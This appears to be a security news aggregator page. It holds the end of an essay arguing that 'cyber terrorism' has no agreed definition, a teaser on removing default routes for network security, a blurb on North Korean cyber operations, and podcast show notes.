  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurances within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of which are bystanders.
  • Terrorism: Violence perputrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition for "cyber terrorism." Our analysis of each definition is found in Figure 1. A factor that might explain the diversity of opinions could be the lack of a singular, agreed upon definition for "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.


Figure 1: Definitions found based on common bins


How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access the internet, a solution that leaves open a possible path by which attackers can breach security.

+Also on Network World: IPv6 deployment guide; What is edge computing and how it’s changing the network?+

To read this article in full, please click here

(Insider Story)

Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention, however their cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives, within the structure of the Reconnaissance General Bureau (RGB) – part of the military of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!